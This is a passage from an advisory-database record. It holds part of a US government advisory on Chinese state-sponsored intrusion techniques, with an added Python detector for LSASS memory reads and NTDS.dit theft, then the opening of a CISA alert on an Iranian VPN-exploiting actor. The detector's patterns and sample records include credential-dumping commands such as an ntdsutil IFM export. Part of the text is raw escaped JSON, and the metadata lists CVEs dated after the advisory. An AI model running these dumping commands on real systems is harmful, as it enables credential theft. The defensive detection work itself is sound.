   * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]

Isolate:

 * Execution Isolation
   * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
   * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)]
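
The LSASS and NTDS.dit recommendations above translate into two detection sources and one configuration check. The Python below is an added example, not from the advisory, working over constructed Sysmon-style records: for ProcessAccess events (Sysmon Event ID 10) it flags any process outside an assumed allowlist that opens `lsass.exe` with `PROCESS_VM_READ` in the granted access mask, and separately flags call stacks that pass through memory not backed by any module; for process creation events it matches command lines that reference `NTDS.dit` directly or through `ntdsutil`, `esentutl`, or a volume shadow copy. `check_lsa_hardening` evaluates the registry values behind the Credential Guard, Protected Process Light, and WDigest recommendations (the value names and key paths are Microsoft's; the allowlist and the sample values are constructed).

```python
import json
import re

PROCESS_VM_READ = 0x0010
# Processes that legitimately read LSASS memory in this (assumed) environment: AV/EDR and core
# Windows components. Constructed allowlist; populate it from your own baseline.
ALLOWED_LSASS_READERS = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}
NTDS_PATTERNS = re.compile(
    r"(ntds\.dit|ntdsutil(\.exe)?\b.*\b(ifm|ntds)\b|esentutl(\.exe)?\b.*(ntds|/y)|"
    r"vssadmin(\.exe)?\s+create\s+shadow|harddiskvolumeshadowcopy)", re.I)


def lsass_access_findings(ev):
    """Sysmon Event ID 10 (ProcessAccess) record; only those targeting lsass.exe are of interest."""
    if not ev["TargetImage"].lower().endswith("\\lsass.exe"):
        return []
    reasons = []
    source = ev["SourceImage"].lower()
    granted = int(ev["GrantedAccess"], 16)
    if granted & PROCESS_VM_READ and source not in ALLOWED_LSASS_READERS:
        reasons.append(f"{source} opened lsass.exe with PROCESS_VM_READ (GrantedAccess {ev['GrantedAccess']})")
    if "UNKNOWN" in ev.get("CallTrace", ""):
        reasons.append("call trace passes through memory not backed by a module (UNKNOWN frame)")
    return reasons


def ntds_findings(ev):
    """Sysmon Event ID 1 (process creation) command line touching the AD database or a shadow copy of it."""
    if NTDS_PATTERNS.search(ev["CommandLine"]):
        return [f"command line references NTDS.dit extraction: {ev['CommandLine']}"]
    return []


def scan_credential_events(lines):
    """{RecordId: reasons} for flagged records in JSON-lines input."""
    flagged = {}
    for line in lines:
        ev = json.loads(line)
        if ev["EventID"] == 10:
            reasons = lsass_access_findings(ev)
        elif ev["EventID"] == 1:
            reasons = ntds_findings(ev)
        else:
            reasons = []
        if reasons:
            flagged[ev["RecordId"]] = reasons
    return flagged


def check_lsa_hardening(values):
    r"""Evaluate the registry values behind the row's hardening advice. `values` maps value name -> data
    (None if absent). RunAsPPL and LsaCfgFlags live under HKLM\SYSTEM\CurrentControlSet\Control\Lsa;
    UseLogonCredential under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest."""
    weaknesses = []
    if values.get("RunAsPPL") not in (1, 2):
        weaknesses.append("LSA is not running as a protected process (RunAsPPL unset or 0)")
    if values.get("LsaCfgFlags") not in (1, 2):
        weaknesses.append("Credential Guard is not enabled (LsaCfgFlags unset or 0)")
    if values.get("UseLogonCredential") == 1:
        weaknesses.append("WDigest keeps plaintext credentials in memory (UseLogonCredential = 1)")
    return weaknesses


# Constructed records: Defender reading LSASS (allowlisted), rundll32 reading LSASS from unbacked memory,
# svchost with a benign query-only mask, an ntdsutil IFM export, and an ordinary cmd.exe.
SAMPLE_CRED_EVENTS = [json.dumps(e) for e in (
    {"RecordId": 1, "EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|C:\Windows\System32\KERNELBASE.dll+2c4ab"},
    {"RecordId": 2, "EventID": 10, "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234|UNKNOWN(000001E3A4B20000)"},
    {"RecordId": 3, "EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d234"},
    {"RecordId": 4, "EventID": 1, "Image": r"C:\Windows\System32\ntdsutil.exe",
     "CommandLine": 'ntdsutil.exe "ac i ntds" "ifm" "create full C:\\Temp\\out" q q'},
    {"RecordId": 5, "EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users"},
)]

if __name__ == "__main__":
    print(scan_credential_events(SAMPLE_CRED_EVENTS))
    print(check_lsa_hardening({"RunAsPPL": None, "LsaCfgFlags": 0, "UseLogonCredential": 1}))
```

The access-mask check is the one that needs care in production: 0x1000 (query limited information) is requested by many benign processes, so the test is for the `PROCESS_VM_READ` bit rather than for any access at all, and the allowlist is keyed on the full lowercase image path so that a copy of `MsMpEng.exe` in a user directory does not inherit the exemption.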

### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]

_Table IX: Chinese state-sponsored cyber actors’ Discovery TTPs with detection and mitigation recommendations_

Technique: File and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.

Detection and Mitigation Recommendations: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.

Defensive Tactics and Techniques:

Detect:

 * User Behavior Analysis
   * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]
 * Process Analysis
   * Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]
   * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
   * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]

Technique: Permission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network.

Detection and Mitigation Recommendations: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

Defensive Tactics and Techniques:

Detect:

 * Process Analysis
   * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
   * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]
 * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]

Technique: Process Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.

Detection and Mitigation Recommendations: Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

Defensive Tactics and Techniques:

Detect:

 * Process Analysis
   * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
   * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]
 * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]

Technique: Network Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]

Threat Actor Procedure(s): Chinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.

Detection and Mitigation Recommendations:

 * Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation.
 * Use network intrusion detection and prevention systems to detect and prevent remote service scans such as those performed with `Nbtscan` or `nmap`.
 * Ensure proper network segmentation is followed to protect critical servers and devices and help mitigate potential exploitation.

Defensive Tactics and Techniques:

Detect:

 * Network Traffic Analysis
   * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]

Isolate:

 * Network Isolation
   * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
\n\u2022 Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`. \n\u2022 Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nRemote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.\n\n| \n\nMonitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]\n\n_Table X: Chinese state-sponsored cyber actors\u2019 Lateral Movement TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and 
Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n| \n\n * Disable or remove unnecessary services.\n\n * Minimize permissions and access for service accounts.\n\n * Perform vulnerability scanning and update software regularly.\n\n * Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)] \n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]\n\n_Table XI: Chinese state-sponsored cyber actors\u2019 Collection TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]\n\n| \n\nChinese state-sponsored cyber actors used 
compression and encryption to package files for exfiltration into RAR archives, and subsequently used cloud storage services to hold them.\n\n| \n\n * Scan systems to identify unauthorized archival utilities or methods unusual for the environment.\n\n * Monitor command-line arguments for known archival utilities that are not common in the organization's environment.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nClipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]\n\n| \n\nChinese state-sponsored cyber actors used RDP and executed `rdpclip.exe` to exfiltrate information from the clipboard.\n\n| \n\n * Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. 
excessive use of `pbcopy`/`pbpaste` (macOS), `xclip`/`xsel` (Linux), or `clip.exe` (Windows) run by general users from the command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to move files into a staging location, such as a compromised Microsoft Exchange or IIS server or an emplaced web shell, prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) 
to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportRequest` PowerShell cmdlet to export target mailboxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques \n| Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary 
malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances, Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. 
\n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). 
Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\n * Monitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. 
Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&CK Framework \n\n\n\n_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). 
When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\nFor NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)\n\nMedia Inquiries / Press Desk: \n\u2022 NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>) \n\u2022 CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>) \n\u2022 FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### References\n\n[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)\n\n### Revisions\n\nJuly 19, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-08-20T12:00:00", "id": "AA21-200B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:30:36", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. 
This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.\n\nThis Advisory provides the threat actor\u2019s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nCISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.\n\nAfter gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor\u2019s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor\u2019s own financial interests. 
The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.\n\nCISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.\n\nTable 1 illustrates some of the common tools this threat actor has used.\n\n_Table 1: Common exploit tools_\n\nTool\n\n| \n\nDetail \n \n---|--- \n \nChunkyTuna web shell\n\n| ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data. \n \nTiny web shell\n\n| Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic. \n \nChina Chopper web shell\n\n| China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \nFRPC | FRPC is a modified version of the open-source FRP tool. It allows a system\u2014inside a router or firewall providing Network Address Translation\u2014to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence. \nChisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). 
It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network. \nngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS. \nNmap | Nmap is used for vulnerability scanning and network discovery. \nAngry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc. \nDrupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices. \n \nNotable means of detecting this threat actor:\n\n * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.\n * The threat actor uses FRPC over port 7557.\n * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.\n\nThe following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.\n\n * Tiny web shell\n\n` /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php \n/netscaler/ns_gui/vpn/images/vpn_ns_gui.php \n/var/vpn/themes/imgs/tiny.php`\n\n * ChunkyTuna web shell\n\n` /var/vpn/themes/imgs/debug.php \n/var/vpn/themes/imgs/include.php \n/var/vpn/themes/imgs/whatfile`\n\n * Chisel\n\n` /var/nstmp/chisel`\n\n### MITRE ATT&CK Framework\n\n#### Initial Access\n\nAs indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. 
From there, the threat actor used the Citrix environment to establish a presence on an internal network server.\n\n_Table 2: Initial access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1190](<https://attack.mitre.org/techniques/T1190/>)\n\n| Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902. \n \n#### Execution\n\nAfter gaining initial access, the threat actor began executing scripts, as shown in table 3.\n\n_Table 3: Execution techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)\n\n| Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data. \n \n[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)\n\n| Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys, likely used as a password-changing mechanism. \n \n#### Persistence\n\nCISA observed the threat actor using the techniques identified in table 4 to establish 